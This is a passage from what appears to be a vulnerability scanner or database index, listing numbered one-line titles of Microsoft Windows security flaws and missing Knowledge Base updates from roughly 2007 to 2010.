981210 update is not installed [57579] Microsoft Windows Cabinet File Viewer (cabview.dll) code execution [57578] Microsoft Windows WinVerifyTrust signature validation code execution [57380] Microsoft Windows Knowledge Base Article 979683 update is not installed [57379] Microsoft Windows kernel symbolic link privilege escalation [57378] Microsoft Windows kernel memory privilege escalation [57377] Microsoft Windows Knowledge Base Article 979559 update is not installed [57376] Microsoft Windows kernel-mode drivers windows privilege escalation [57375] Microsoft Windows kernel-mode drivers objects privilege escalation [57374] Microsoft Windows Knowledge Base Article 977816 update is not installed [57372] Microsoft Windows Knowledge Base Article 978338 update is not installed [57370] Microsoft Windows ISATAP IPv6 spoofing [57343] Microsoft Windows Knowledge Base Article 979402 update is not installed [57342] Microsoft Windows Media Player ActiveX control code execution [57341] Microsoft Windows Knowledge Base Article 980094 update is not installed [57337] Microsoft Windows Knowledge Base Article 980195 update is not installed [57336] Microsoft Windows Knowledge Base Article 980232 update is not installed [57335] Microsoft Windows SMB message code execution [57334] Microsoft Windows SMB transaction responses code execution [57333] Microsoft Windows SMB code execution [57332] Microsoft Windows SMB memory privilege escalation [57330] Microsoft Windows Knowledge Base Article 980858 update is not installed [57329] Microsoft Windows Media Services info packets buffer overflow [57328] Microsoft Windows Knowledge Base Article 981160 update is not installed [57326] Microsoft Windows Knowledge Base Article 981169 update is not installed [57325] Microsoft Windows Knowledge Base Article 981832 update is not installed [57324] Microsoft Windows SMTP Service Simple Mail Transfer Protocol memory information disclosure [57323] Microsoft Windows SMTP Service and Microsoft Exchange SMTP DNS Mail Exchanger (MX) denial of service [57322] Microsoft Windows Knowledge Base Article 980182 update is not installed [57205] Microsoft Windows Media Player .AVI code execution [56853] Microsoft Windows MS HTML Help ActiveX control (hhctrl.ocx) HtmlHelpA() code execution [56756] Microsoft Windows .ani file denial of service [56591] Microsoft Windows API denial of service [56560] Microsoft Windows winhlp32.exe buffer overflow [56558] Microsoft Windows MsgBox() code execution [56470] Microsoft Windows Knowledge Base Article 980150 update is not installed [56461] Microsoft Windows Knowledge Base Article 975561 update is not installed [56435] Microsoft Windows Media Player .mpg denial of service [56218] Microsoft Windows DNS weak security [55935] Microsoft Windows Knowledge Base Article 975713 update is not installed [55934] Microsoft Windows Knowledge Base Article 978037 update is not installed [55933] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) privilege escalation [55932] Microsoft Windows Knowledge Base Article 978214 update is not installed [55930] Microsoft Windows Knowledge Base Article 977935 update is not installed [55928] Microsoft Windows Knowledge Base Article 978706 update is not installed [55926] Microsoft Windows Knowledge Base Article 977894 update is not installed [55925] Microsoft Windows Hyper-V instruction set denial of service [55924] Microsoft Windows Knowledge Base Article 977377 update is not installed [55923] Microsoft Windows Knowledge Base Article 977290 update is not installed [55922] Microsoft Windows Kerberos Ticket-Granting-Ticket (TGT) denial of service [55921] Microsoft Windows Knowledge Base Article 977165 update is not installed [55920] Microsoft Windows kernel privilege escalation [55917] Microsoft Windows Knowledge Base Article 978262 update is not installed [55910] Microsoft Windows Knowledge Base Article 971468 update is not installed [55909] Microsoft Windows SMB NTLM privilege escalation [55908] Microsoft Windows SMB NULL denial of service [55907] Microsoft Windows SMB denial of service [55906] Microsoft Windows SMB pathname code execution [55898] Microsoft Windows Knowledge Base Article 974145 update is not installed [55897] Microsoft Windows TCP/IP SACK denial of service [55896] Microsoft Windows TCP/IP Route Information code execution [55895] Microsoft Windows TCP/IP stack datagram code execution [55894] Microsoft Windows TCP/IP ICMPv6 code execution [55890] Microsoft Windows Knowledge Base Article 975416 update is not installed [55779] Microsoft Windows Knowledge Base Article 978207 update is not installed [55742] Microsoft Windows #GP trap handler privilege escalation [55680] Microsoft Windows Media Player ActiveX control code execution [55560] Microsoft Windows XP Flash Player code execution [55153] Microsoft Windows Knowledge Base Article 978251 update is not installed [55152] Microsoft Windows Server Message Block client code execution [55151] Microsoft Windows Server Message Block pool code execution [55150] Microsoft Windows Knowledge Base Article 972270 update is not installed [55149] Microsoft Windows EOT font buffer overflow [54645] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54644] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54643] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54642] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54445] Microsoft Windows Knowledge Base Article 975539 update is not installed [54443] Microsoft Windows Knowledge Base Article 974392 update is not installed [54442] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [54440] Microsoft Windows Knowledge Base Article 974318 update is not installed [54439] Microsoft Windows Internet Authentication Service (IAS) privilege escalation [54438] Microsoft Windows Internet Authentication Service (IAS) code execution [54427] Microsoft Windows Knowledge Base Article 971726 update is not installed [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [54424] Microsoft Windows Knowledge Base Article 967183 update is not installed [54422] Microsoft Windows Knowledge Base Article 976325 update is not installed [54217] Microsoft Windows KeAccumulateTicks() denial of service [54012] Microsoft Windows Knowledge Base Article 972652 update is not installed [53991] Microsoft Windows Knowledge Base Article 973309 update is not installed [53990] Microsoft Windows ADAM LDAP denial of service [53986] Microsoft Windows Knowledge Base Article 973565 update is not installed [53985] Microsoft Windows WSDAPI code execution [53981] Microsoft Windows Knowledge Base Article 974783 update is not installed [53980] Microsoft Windows 2000 License Logging Server buffer overflow [53977] Microsoft Windows Knowledge Base Article 976307 update is not installed [53975] Microsoft Windows Knowledge Base Article 969947 update is not installed [53974] Microsoft Windows kernel font code execution [53973] Microsoft Windows kernel GDI privilege escalation [53972] Microsoft Windows kernel NULL pointer privilege escalation [53551] Microsoft Windows Knowledge Base Article KB973525 update is not installed [53550] Microsoft Windows Knowledge Base Article 974112 update is not installed [53549] Microsoft Windows Media Player ASF file buffer overflow [53548] Microsoft Windows Knowledge Base Article 971486 update is not installed [53547] Microsoft Windows kernel exception handler denial of service [53546] Microsoft Windows kernel user mode privilege escalation [53545] Microsoft Windows kernel 64-bit truncation privilege escalation [53544] Microsoft Windows Knowledge Base Article 974455 update is not installed [53541] Microsoft Windows Knowledge Base Article 969059 update is not installed [53540] Microsoft Windows Indexing Service ActiveX control code execution [53537] Microsoft Windows Knowledge Base Article 974571 update is not installed [53536] Microsoft Windows CryptoAPI ASN.1 spoofing [53535] Microsoft Windows CryptoAPI NULL spoofing [53534] Microsoft Windows Knowledge Base Article 975254 update is not installed [53533] Microsoft Windows Knowledge Base Article 957488 update is not installed [53531] Microsoft Windows GDI+ Microsoft Office file code execution [53530] Microsoft Windows GDI+ PNG image code execution [53529] Microsoft Windows GDI+ .NET Framework API code execution [53528] Microsoft Windows GDI+ TIFF image code execution [53527] Microsoft Windows GDI+ TIFF image buffer overflow [53526] Microsoft Windows GDI+ PNG image buffer overflow [53525] Microsoft Windows GDI+ WMF image code execution [53522] Microsoft Windows Knowledge Base Article 975517 update is not installed [53517] Microsoft Windows Knowledge Base Article 975682 update is not installed [53516] Microsoft Windows Media Player audio files code execution [53514] Microsoft Windows Media Player ASF code execution [53512] Microsoft Windows Knowledge Base Article 975467 update is not installed [53511] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [53090] Microsoft Windows srv2.sys code execution [52948] Microsoft Windows Knowledge Base Article 973965 update is not installed [52775] Microsoft Windows Knowledge Base Article 973812 update is not installed [52774] Microsoft Windows Media Format MP3 files code execution [52773] Microsoft Windows Media Format ASF files code execution [52771] Microsoft Windows Knowledge Base Article 971961 update is not installed [52770] Microsoft Windows Jscript code execution [52403] Microsoft Windows OpenType font engine denial of service [52137] Microsoft Windows Knowledge Base Article 969706 update is not installed [52131] Microsoft Windows Knowledge Base Article 972260 update is not installed [52128] Microsoft Windows Knowledge Base Article 967723 update is not installed [52127] Microsoft Windows TCP/IP orphaned connections denial of service [52126] Microsoft Windows TCP/IP timestamps code execution [52117] Microsoft Windows Knowledge Base Article 970927 update is not installed [52116] Microsoft Windows RDP Services Client ActiveX control buffer overflow [52115] Microsoft Windows Remote Desktop Connection RDP buffer overflow [52114] Microsoft Windows Knowledge Base Article 970957 update is not installed [52113] ASP.NET Framework component of Microsoft Windows HTTP denial of service [52111] Microsoft Windows Knowledge Base Article 969883 update is not installed [52110] Microsoft Windows Windows Internet Name Service (WINS) replication partner buffer overflow [52109] Microsoft Windows Windows Internet Name Service (WINS) replication buffer overflow [52108] Microsoft Windows Knowledge Base Article 960859 update is not installed [52107] Microsoft Windows Knowledge Base Article 971032 update is not installed [52104] Microsoft Windows telnet privilege escalation [52103] Microsoft Windows Knowledge Base Article 956844 update is not installed [52102] Microsoft Windows DHTML Editing Component ActiveX control code execution [52097] Microsoft Windows Knowledge Base Article 971557 update is not installed [52096] Microsoft Windows AVI validation integer overflow [52095] Microsoft Windows AVI code execution [52093] Microsoft Windows Knowledge Base Article 971657 update is not installed [52089] Microsoft Windows Knowledge Base Article 973908 update is not installed [51636] Microsoft Windows Knowledge Base Article KB973346 update is not installed [51471] Microsoft Windows Knowledge Base Article 970811 update is not installed [51469] Microsoft Windows Knowledge Base Article 970710 update is not installed [51468] Microsoft Windows Wireless LAN AutoConfig service buffer overflow [51465] Microsoft Windows Knowledge Base Article 969856 update is not installed [51463] Microsoft Windows Knowledge Base Article 971633 update is not installed [51462] Microsoft Windows Knowledge Base Article 969516 update is not installed [51457] Microsoft Windows Knowledge Base Article 957638 update is not installed [51097] Microsoft Windows atapi.sys privilege escalation [51034] Microsoft PowerPoint Freelance Windows buffer overflow [50973] Microsoft Windows Server 2003 and Vista win32k.sys denial of service [50903] Microsoft Windows SPI_SETDESKWALLPAPER SystemParametersInfo denial of service [50826] Microsoft Windows Knowledge Base Article 969898 update is not installed [50798] Microsoft Windows Knowledge Base Article 970238 update is not installed [50795] Microsoft Windows Knowledge Base Article 969514 update is not installed [50791] Microsoft Windows Knowledge Base Article 969462 update is not installed [50783] Microsoft Windows Knowledge Base Article 968537 update is not installed [50782] Microsoft Windows desktop parameter privilege escalation [50781] Microsoft Windows system call privilege escalation [50780] Microsoft Windows kernel pointer privilege escalation [50779] Microsoft Windows kernel kernel objects privilege escalation [50778] Microsoft Windows Knowledge Base Article 963093 update is not installed [50777] Microsoft Windows Search weak security [50776] Microsoft Windows Knowledge Base Article 969897 update is not installed [50768] Microsoft Windows Knowledge Base Article 970483 update is not installed [50767] Microsoft Windows Knowledge Base Article 971055 update is not installed [50766] Microsoft Windows Knowledge Base Article 961501 update is not installed [50765] Microsoft Windows Print Spooler service privilege escalation [50763] Microsoft Windows Print Spooler service buffer overflow [50762] Microsoft Windows Knowledge Base Article 961371 update is not installed [50761] Microsoft Windows Active Directory LDAP denial of service [50760] Microsoft Windows Embedded OpenType (EOT) integer overflow [50759] Microsoft Windows 2000 Active Directory LDAP code execution [50758] Microsoft Windows EOT buffer overflow [50757] Microsoft Windows Knowledge Base Article 957632 update is not installed [50391] Microsoft Windows Media Player MID file denial of service [50281] Microsoft Windows Knowledge Base Article 967340 update is not installed [50129] Microsoft Windows gdiplus.dll PNG denial of service [49598] Microsoft Windows Knowledge Base Article 959426 update is not installed [49588] Microsoft Windows Knowledge Base Article 960477 update is not installed [49586] Microsoft Windows Knowledge Base Article 959454 update is not installed [49584] Microsoft Windows Threadpool ACL privilege escalation [49578] Microsoft Windows WMI privilege escalation [49570] Microsoft Windows Knowledge Base Article 961759 update is not installed [49569] Microsoft Windows Knowledge Base Article 960803 update is not installed [49566] Microsoft Windows HTTP services certificate spoofing [49562] Microsoft Windows HTTP services integer underflow [49560] Microsoft Windows Knowledge Base Article 961373 update is not installed [49558] Microsoft Windows Knowledge Base Article 963027 update is not installed [49547] Microsoft Windows Knowledge Base Article 968557 update is not installed [49438] Microsoft Windows GDI+ EMF EmfPlusFont Object denial of service [49435] Microsoft Windows unlzh.c and unpack.c gzip code execution [49079] Microsoft Windows DNS server memory leak denial of service [48909] Microsoft Windows Knowledge Base Article 962238 update is not installed [48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing [48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing [48906] Microsoft Windows DNS server cache response spoofing [48905] Microsoft Windows DNS server query response spoofing [48392] Microsoft Windows I/O information disclosure [48326] Microsoft Windows Knowledge Base Article 960715 update is not installed [48312] Microsoft Windows Knowledge Base Article 959420 update is not installed [48311] Microsoft Windows Knowledge Base Article 961260 update not installed [48308] Microsoft Windows Knowledge Base Article 960225 update is not installed [48307] Microsoft Windows SChannel certificate spoofing [48302] Microsoft Windows Knowledge Base Article 957634 update not installed [48301] Microsoft Windows Knowledge Base Article 958690 update is not installed [48300] Microsoft Windows kernel pointer validation privilege escalation [48299] Microsoft Windows kernel handle validation privilege escalation [48298] Microsoft Windows kernel GDI validation code execution [48295] Microsoft Windows Knowledge Base Article 974378 update not installed [48189] Microsoft Windows AutoRun feature enabled [47867] Microsoft Windows .CHM file denial of service [47760] Microsoft Windows Media Player WAV file code execution [47676] Microsoft Windows Knowledge Base Article 958687 update not installed [47674] Microsoft Windows SMB NT Trans2 request code execution [47673] Microsoft Windows SMB NT Trans request buffer overflow [47672] Microsoft Windows Knowledge Base Article 959239 update not installed [47664] Microsoft Windows Media Player WAV or SND file denial of service [47428] Microsoft Windows Knowledge Base Article 960714 update is not installed [46870] Microsoft Windows Knowledge Base Article 959807 update is not installed [46869] Microsoft Windows Media Components ISATAP information disclosure [46868] Microsoft Windows Media Components SPN NTLM credentials code execution [46867] Microsoft Windows Knowledge Base Article 959349 update is not installed [46866] Microsoft Windows search-ms protocol code execution [46865] Microsoft Windows saved search file code execution [46864] Microsoft Windows Knowledge Base Article 959070 update is not installed [46861] Microsoft Windows Knowledge Base Article 958215 update not installed [46856] Microsoft Windows Knowledge Base Article 957175 update is not installed [46853] Microsoft Windows Knowledge Base Article 957173 update not installed [46844] Microsoft Windows Knowledge Base Article 956802 update is not installed [46843] Microsoft Windows GDI WMF image file buffer overflow [46842] Microsoft Windows GDI WMF image file integer overflow [46742] Microsoft Windows Vista iphlpapi.dll buffer overflow [46670] Microsoft Communicator, Office Communications Server (OCS) and Windows Live Messenger RTCP unspecified denial of service [46506] Microsoft Windows UnhookWindowsHookEx() denial of service [46385] Microsoft Windows Media Player MIDI or DAT file denial of service [46194] Microsoft Windows Knowledge Base Article 957097 update is not installed [46191] Microsoft Windows SMB NTLM credentials code execution [46190] Microsoft Windows Knowledge Base Article 932349 update is not installed [46188] Microsoft Visual Basic Windows Common ActiveX control AVI buffer overflow [46102] Microsoft Windows 2003 SP2 is not installed on the system [46101] Microsoft Windows 2003 SP1 is not installed on the system [46100] Microsoft Windows XP Service Pack 3 is not installed on the system [46099] Microsoft Windows XP Service Pack 1 is not installed on the system [46042] Microsoft Windows Knowledge Base Article 958644 update not installed [45857] Microsoft Windows Mobile HTC Hermes device security bypass [45719] Microsoft Windows Vista page faults denial of service [45586] Microsoft Windows Knowledge Base Article 957280 update is not installed [45585] Microsoft Windows Active Directory LDAP search buffer overflow [45582] Microsoft Windows Knowledge Base Article 956803 update is not installed [45581] Microsoft Windows Knowledge Base Article 956416 update is not installed [45578] Microsoft Windows Ancillary Function Driver privilege escalation [45572] Microsoft Windows Knowledge Base Article 9556841 update is not installed [45571] Microsoft Windows Memory Manager Virtual Address Descriptors privilege escalation [45565] Microsoft Windows Knowledge Base Article 956390 update is not installed [45561] Microsoft Windows Knowledge Base Article 957095 update is not installed [45560] Microsoft Windows SMB file name buffer underflow [45557] Microsoft Windows Knowledge Base Article 955218 update is not installed [45550] Microsoft Windows Knowledge Base Article 957699 update is not installed [45548] Microsoft Windows Knowledge Base Article 953155 update is not installed [45545] Microsoft Windows Internet Printing Protocol code execution [45544] Microsoft Windows Knowledge Base Article 954211 update is not installed [45543] Microsoft Windows kernel input privilege escalation [45542] Microsoft Windows kernel system calls privilege escalation [45541] Microsoft Windows kernel new window privilege escalation [45538] Microsoft Windows Knowledge Base Article 951071 update is not installed [45537] Microsoft Message Queuing RPC code execution [45464] Microsoft Windows XP GDI+ .ICO denial of service [45463] Microsoft Windows Mobile bluetooth device name denial of service [45209] Microsoft Windows Media Player installed [45146] Microsoft Windows WRITE_ANDX SMB packet denial of service [45015] Microsoft Windows Image Aquisition Logger ActiveX control file overwrite [44727] Microsoft Windows Knowledge Base Article 956391 update not installed [44716] Microsoft Windows Knowledge Base Article 954593 update not installed [44715] Microsoft Windows GDI+ BMP header buffer overflow [44714] Microsoft Windows GDI+ WMF buffer overflow [44713] Microsoft Windows GDI+ GIF index parsing buffer overflow [44711] Microsoft Windows GDI+ EMF code execution [44710] Microsoft Windows GDI+ VML gradient buffer overflow [44708] Microsoft Windows Knowledge Base Article 955047 update not installed [44705] Microsoft Windows Knowledge Base Article 956695 update not installed [44704] Microsoft Host Integration Server SNA RPC code execution [44703] Microsoft Windows Knowledge Base Article 954156 update not installed [44700] Microsoft Windows Media Encoder wmex.dll ActiveX control buffer overflow [44625] Microsoft Windows ATL Load() code execution [44423] Microsoft Windows nslookup.exe code execution [44106] Microsoft Windows Knowledge Base Article 953839 update not installed [44099] Microsoft Windows Knowledge Base Article 953838 update not installed [44092] Microsoft Windows Knowledge Base Article 954066 update not installed [44087] Microsoft Windows Knowledge Base Article 953733 update not installed [44086] Microsoft Windows IPSec policy information disclosure [44085] Microsoft Windows Knowledge Base Article 952954 update not installed [44083] Microsoft Windows Knowledge Base Article 954154 update not installed [44082] Microsoft Windows Media Player sampling rate SSPL buffer overflow [44081] Microsoft Windows Knowledge Base Article 955048 update not installed [44080] Microsoft Windows Knowledge Base Article 955617 update not installed [44079] Microsoft Windows Knowledge Base Article 950974 update not installed [43340] Microsoft Windows Knowledge Base Article 950582 update not installed [43339] Microsoft Windows Explorer saved search file code execution [43336] Microsoft Windows Knowledge Base Article 953230 update not installed [43335] Microsoft Windows DNS Server cache poisoning [43330] Microsoft Windows Knowledge Base Article 953747 update not installed [42887] Microsoft Windows Installer msiexec.exe GUID buffer overflow [42765] Apple Safari Microsoft Windows code execution [42701] Microsoft Windows Knowledge Base Article 950760 update not installed [42699] Microsoft Windows Vista speech recognition (sapi.dll) command execution [42697] Microsoft Windows Knowledge Base Article 950762 update not installed [42696] Microsoft Windows PGM fragment option denial of service [42695] Microsoft Windows PGM option length denial of service [42693] Microsoft Windows Knowledge Base Article 950759 update not installed [42691] Microsoft Windows Knowledge Base Article 949785 update not installed [42689] Microsoft Windows Knowledge Base Article 951066 update not installed bluetooth [42685] Microsoft Windows Knowledge Base Article 951376 update not installed [42684] Microsoft Windows Knowledge Base Article 948745 update not installed [42682] Microsoft Windows Bluetooth SDP code execution [42677] Microsoft Windows Knowledge Base Article 955702 update not installed [42676] Microsoft Windows Messenger ActiveX control information disclosure [42675] Microsoft Windows Knowledge Base Article 951698 update not installed [42674] Microsoft Windows DirectX SAMI buffer overflow [42672] Microsoft Windows Knowledge Base Article 953235 update not installed [42668] Microsoft Windows Active Directory LDAP request denial of service [42358] Microsoft Windows I2O Utility Filter driver (i2omgmt.sys) code execution [42334] Microsoft Windows CE JPEG and GIF code execution [42109] Microsoft Windows Knowledge Base Article 952044 update not installed [42103] Microsoft Windows Knowledge Base Article 951208 update not installed [42101] Microsoft Windows Knowledge Base Article 951207 update not installed [42095] Microsoft Windows Knowledge Base Article 950749 update not installed [41880] Microsoft Windows MSDTC privilege escalation [41481] Microsoft Windows Knowledge Base Article 945553 update not installed [41480] Microsoft Windows DNS client spoofing [41477] Microsoft Windows Knowledge Base Article 947864 update not installed [41473] Microsoft Windows Knowledge Base Article 948590 update not installed [41472] Microsoft Windows GDI EMF filename parameter buffer overflow [41471] Microsoft Windows GDI EMF and WMF header buffer overflow [41470] Microsoft Windows Knowledge Base Article 941693 update not installed [41469] Microsoft Windows kernel usermode privilege escalation [41465] Microsoft Windows Knowledge Base Article 948881 update not installed [41463] Microsoft Windows Knowledge Base Article 941203 update not installed [41453] Microsoft Windows Knowledge Base Article 949032 update not installed [41448] Microsoft Windows Knowledge Base Article 950183 update not installed [41349] Microsoft Windows AutoPlay NoDriveTypeAutoRun weak security [40937] Microsoft Windows Knowledge Base Article 815495 update not installed [40889] Microsoft Windows Knowledge Base Article 949030 update not installed [40886] Microsoft Windows Knowledge Base Article 949031 update not installed [40879] Microsoft Windows Knowledge Base Article 949029 update not installed [40693] Microsoft Windows Video Controller ActiveX Library for streaming video (msvidctl.dll) buffer overflow [40103] Microsoft Windows Knowledge Base Article 946538 update not installed [40102] Microsoft Windows Active Directory LDAP request denial of service [40101] Microsoft Windows Knowledge Base Article 947077 update not installed [40099] Microsoft Windows Knowledge Base Article 946456 update not installed [40098] Microsoft Windows Vista DHCP denial of service [40097] Microsoft Windows Knowledge Base Article 947081 update not installed [40094] Microsoft Windows Knowledge Base Article 947085 update not installed [40091] Microsoft Windows Knowledge Base Article 944533 update not installed [40078] Microsoft Windows Knowledge Base Article 947108 update not installed [40063] Microsoft Windows Knowledge Base Article 946026 update not installed [40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow [40059] Microsoft Windows Knowledge Base Article 944338 update not installed [40056] Microsoft Windows VBScript and JScript engines code execution [40048] Microsoft Windows Knowledge Base Article 947890 update not installed [40043] Microsoft Windows OLE script request buffer overflow [39453] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) MLDv2 buffer overflow [39452] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) IGMPv3 buffer overflow [39254] Microsoft Windows TCP/IP ICMP denial of service [39238] Microsoft Windows Knowledge Base Article 941644 update not installed [39237] Microsoft Windows Knowledge Base Article 942831 update not installed [39236] Microsoft Windows Knowledge Base Article 943485 update not installed [39233] Microsoft Windows LSASS LPC privilege escalation [39232] Microsoft Windows Knowledge Base Article 942830 update not installed [39052] Microsoft Windows DirectX MJPEG decoder code execution [38865] Cisco Security Agent for Microsoft Windows SMB buffer overflow [38850] Microsoft Windows CryptGenRandom information disclosure [38830] Microsoft Windows Media File Format Stream Property error correction buffer overflow [38829] Microsoft Windows Media File Format Stream Property error correction and type-specific buffer overflow [38828] Microsoft Windows Media File Format audio_conceal_none buffer overflow [38827] Microsoft Windows Media File Format Degradable JPEG Media Stream buffer overflow [38797] Microsoft Windows Media Player AIFF denial of service [38730] Microsoft Windows Knowledge Base Article 943078 update not installed [38729] Microsoft Windows Vista kernel ALPC privilege escalation [38728] Microsoft Windows Knowledge Base Article 944653 update not installed [38726] Microsoft Windows Knowledge Base Article 942624 update not installed [38725] Microsoft Windows Vista SMBv2 signing code execution [38723] Microsoft Windows Knowledge Base Article 941568 update not installed [38717] Microsoft Windows Knowledge Base Article 942615 update not installed [38711] Microsoft Windows Knowledge Base Article 941569 update not installed [38315] Microsoft Windows Knowledge Base Article 943460 update not installed [37284] Microsoft Windows Macrovision secdrv.sys driver buffer overflow [37249] Microsoft Windows Mobile SMS sender field obfuscation [37226] Microsoft Windows Knowledge Base Article 815495 update not installed [36980] Microsoft Windows Explorer PNG file denial of service [36961] Microsoft Windows Explorer extended attributes multiple buffer overflows [36819] Microsoft Windows Knowledge Base Article 939653 update not installed [36812] Microsoft Windows Knowledge Base Article 941202 update not installed [36811] Microsoft Outlook Express and Windows Mail NNTP response code execution [36807] Microsoft Windows Knowledge Base Article 933729 update not installed [36806] Microsoft Windows Knowledge Base Article 941672 update not installed [36805] Microsoft Windows DNS spoofing information disclosure [36804] Microsoft Windows Knowledge Base Article 942695 update not installed [36800] Microsoft Windows Knowledge Base Article 923810 update not installed [36799] Microsoft Windows Kodak image Viewer code execution [36662] Microsoft Windows Media Player meta file security bypass [36608] Microsoft Windows MFC ActiveX FindFile() buffer overflow [36490] Microsoft Windows Knowledge Base Article 942099 update not installed [36381] Microsoft Windows Knowledge Base Article 939778 update not installed [36378] Microsoft Windows UNIX services setuid binary privilege escalation [36376] Microsoft Windows Knowledge Base Article 941522 update not installed [35919] Microsoft Windows VML detected [35902] Microsoft Windows process scheduler denial of service [35897] Microsoft Windows Vista Weather Gadget code execution [35895] Microsoft Windows Media Player skin decompression code execution [35886] Microsoft Windows ARP request denial of service [35878] Microsoft Windows Media Player .AU file denial of service [35853] Microsoft Windows Vista kernel unspecified vulnerability [35816] Microsoft Windows Knowledge Base Article 940965 update not installed [35802] Microsoft Windows Vista Calendar ICS denial of service [35771] Microsoft Windows Vista Contacts Gadget code execution [35770] Microsoft Windows Vista Feed Headlines Gadget code execution [35766] Microsoft Windows Knowledge Base Article 937894 update not installed [35762] Microsoft Windows Knowledge Base Article 938127 update not installed [35761] Microsoft Windows VML vgx.dll buffer overflow [35760] Microsoft Windows Knowledge Base Article 937143 update not installed [35753] Microsoft Windows Knowledge Base Article 938827 update not installed [35746] Microsoft Windows Knowledge Base Article 938829 update not installed [35745] Microsoft Windows GDI WMF image code execution [35742] Microsoft Windows Knowledge Base Article 936782 update not installed [35741] Microsoft Windows Media Player skin parsing buffer overflow [35739] Microsoft Windows Knowledge Base Article 942017 update not installed [35582] Microsoft Windows URI protocol handling command execution [35538] Microsoft Windows Explorer GIF denial of service [35397] Microsoft Windows Vista USER32.DLL denial of service [35322] Microsoft Windows Vista firewall information disclosure [35219] Microsoft Windows Knowledge Base Article 936542 update is not installed [35216] Microsoft Windows Knowledge Base Article 933103 update not installed [35206] Microsoft Windows Knowledge Base Article 939373 update is not installed [35202] Microsoft Windows Knowledge Base Article 935807 update not installed [35199] Microsoft Windows Knowledge Base Article 936227 update not installed [35190] Microsoft Windows Knowledge Base Article 936548 update not installed [35183] Microsoft Windows Knowledge Base Article 937986 update not installed [35181] Microsoft Windows Knowledge Base Article 926122 update is not installed [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [35059] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) multiple buffer overflows [34743] Microsoft Windows GDI+ denial of service [34648] Microsoft Windows Knowledge Base Article 935839 update not installed [34645] Microsoft Windows Win32 API code execution [34642] Microsoft Windows Knowledge Base Article 935840 update not installed [34640] Microsoft Windows Knowledge Base Article 931212 update not installed .NET [34636] Microsoft Windows Schannel code execution [34634] Microsoft Windows Server 2003 Active Directory information disclosure [34633] Microsoft Windows Knowledge Base Article 933566 update not installed [34624] Microsoft Windows Knowledge Base Article 929123 update not installed [34623] Microsoft Windows MHTML Content-Disposition information disclosure [34622] Microsoft Windows MHTML URL redirect information disclosure [34618] Microsoft Windows Vista ACL user credentials information disclosure [34611] Microsoft Windows Knowledge Base Article 927051 update not installed [34599] Microsoft Windows Server 2003 terminal server security bypass [34444] Microsoft Windows unspecified code execution [34032] Microsoft Windows Knowledge Base Article 935966 update not installed [33959] Microsoft Windows Virtual DOS Machine (VDM) VdmpInitialize privilege escalation [33916] Microsoft Windows Knowledge Base Article 934233 update not installed [33909] Microsoft Windows Knowledge Base Article 934873 update not installed [33902] Microsoft Windows Knowledge Base Article 934232 update not installed [33891] Microsoft Windows Knowledge Base Article 931832 update not installed [33667] Microsoft Windows unspecified buffer overflow [33473] Microsoft Windows dynamic DNS update unauthorized access [33410] Microsoft Windows Vista LLTD Mapper host spoofing [33409] Microsoft Windows Vista LLTD Mapper bridge spoofing [33401] Microsoft Windows Vista LLTD Responder host spoofing [33399] Microsoft Windows Vista LLTD Mapper denial of service [33398] Microsoft Windows Vista Teredo address weak security [33396] Microsoft Windows Vista Meeting Space weak security [33395] Microsoft Windows Vista nonce spoofing [33394] Microsoft Windows Vista Neighbor Advertisements spoofing [33393] Microsoft Windows Vista ARP denial of service [33301] Microsoft Windows animated cursor (ANI) buffer overflow [33300] Microsoft Windows Vista atikmdag.sys slideshow denial of service [33272] Microsoft Windows Vista CSRSS CsrFinalizeContext privilege escalation [33271] Microsoft Windows Knowledge Base Article 931784 update not installed [33270] Microsoft Windows kernel VDM mapped memory privilege escalation [33269] Microsoft Windows Knowledge Base Article 931261 update not installed [33268] Microsoft Windows Universal Plug and Play HTTP buffer overflow [33267] Microsoft Windows Knowledge Base Article 932168 update not installed [33266] Microsoft Windows Knowledge Base Article 925902 update not installed [33264] Microsoft Windows TrueType Fonts rasterizer privilege escalation [33263] Microsoft Windows GDI color parameter buffer overflow [33261] Microsoft Windows GDI window size privilege escalation [33259] Microsoft Windows GDI EMF image buffer overflow [33258] Microsoft Windows GDI WMF image denial of service [33257] Microsoft Windows Knowledge Base Article 931768 update not installed [33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure [33225] Microsoft Windows Media File Format ASF multiple buffer overflows [33167] Microsoft Windows Vista Mail Client code execution [33118] Microsoft Windows XP winmm.dll denial of service [33117] Microsoft Windows MFC AfxOleSetEditMenu() buffer overflow [33086] Microsoft Windows Ndistapi.sys driver denial of service [33037] Microsoft Windows Explorer WMF file denial of service [32921] Microsoft Windows ole32.dll library denial of service [32808] Microsoft Windows Shell User Logon ActiveX control shgina.dll unauthorized access [32740] Microsoft Windows Knowledge Base Article 931906 update not installed [32738] Microsoft Windows Knowledge Base Article 925939 update not installed [32644] Microsoft Windows ReadDirectoryChangesW information disclosure [32419] Microsoft Windows Knowledge Base Article 932554 update not installed [32394] Microsoft Windows Mobile Internet Explorer WML page denial of service [32282] Microsoft Windows Knowledge Base Article 927802 update not installed [32280] Microsoft Windows Image Acquisition service buffer overflow [32153] Microsoft Windows permanent password detected [32116] Microsoft Windows administrator password no expiration set [32111] Microsoft Windows Knowledge Base Article 928255 update not installed [32110] Microsoft Windows Knowledge Base Article 928843 update not installed [32109] Microsoft Windows HTML Help ActiveX control code execution [32108] Microsoft Windows shell new hardware detection privilege escalation [32107] Microsoft Windows Knowledge Base Article 928090 update not installed [32104] Microsoft Windows Knowledge Base Article 929434 update not installed [32090] Microsoft Windows Knowledge Base Article 927779 update not installed [32071] Microsoft Windows Explorer AVI file denial of service [32002] Microsoft Windows 